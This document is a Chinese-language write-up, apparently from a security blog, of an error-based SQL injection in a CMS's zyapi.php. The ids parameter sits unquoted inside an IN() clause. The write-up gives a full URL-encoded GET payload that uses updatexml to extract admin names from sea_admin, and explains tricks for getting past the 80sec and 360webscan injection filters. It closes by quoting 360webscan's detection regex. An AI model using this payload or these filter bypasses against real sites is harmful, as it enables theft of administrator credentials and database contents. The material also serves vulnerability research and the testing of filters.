|
需要开启/data/admin/isapi.txt ,当里面的数值为1时,就可以报错注入 存在漏洞的页面:zyapi.php function cj()
{
global $dsql,$rtype,$rpage,$rkey,$rday,$action,$app_apiver,$app_apipagenum,$cfg_basehost,$ids;
$xmla = "<?xml version=\"1.0\" encoding=\"utf-8\"?>";
$xmla .= "<rss version=\"".$app_apiver."\">";
$sql = "select d.*,p.body as v_playdata,p.body1 as v_playdata1,t.tname from sea_data d left join `sea_type` t on t.tid=d.tid left join `sea_playdata` p on p.v_id=d.v_id where d.v_recycled=0 ";
$sql1 = "select count(*) as dd from sea_data where v_recycled=0 ";
if($ids!=""){
$ids = addslashes($ids);
$sql .= " AND d.v_id in (". $ids .")";
$sql1 .= " AND v_id in (". $ids .")";
}$ids没加引号。get方式 payload: /zyapi.php?ac=videolist&ids=1%29and%0b1%3D%40%60%27%60%0band%0b%28updatexml%281%2Cconcat%23%0a%281%2C%28select%0b%7Bx+name%7D%0bfrom%0bsea_admin%29%29%2C1%29%29and%0b1%3D%40%60%27%60%0band%0b%280.1%3D0.1入库以后有句话,可把我难受死了,trim()函数,最后用+和%0b 来绕过。折腾了好久,下次要记住了。空格都用+来替换是不行的。 if(!m_eregi("limit",$sql)) $this->SetQuery(m_eregi_replace("[,;]$",'',trim($sql))." limit 0,1;");
上面的payload解释一下,@'`' @'`'来绕过80sec的防注入代码。 concat%23%0a()来绕过80sec防注入,select {x+name} from sea_admin 是绕过360webscan的正则匹配。 \<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|src)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|\b(group_)?concat[\s\/\*]*?\([^\)]+?\)|\bcase[\s\/\*]*?when[\s\/\*]*?\([^\)]+?\)|load_file\s*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})\s*?=|^\+\/v(8|9)|\b(and|or)\b\s*?([\(\)'"\d]+?=[\(\)'"\d]+?|[\(\)'"a-zA-Z]+?=[\(\)'"a-zA-Z]+?|>|<|\s+?[\w]+?\s+?\bin\b\s*?\(|\blike\b\s+?["'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|").*?(`|'|")\s*)|UPDATE\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|").*?(`|'|")\s*)SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|'|").*?(`|'|"))FROM(\(.+\)|\s+?.+?|(`|'|").*?(`|'|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)
get 360webscan 正则
|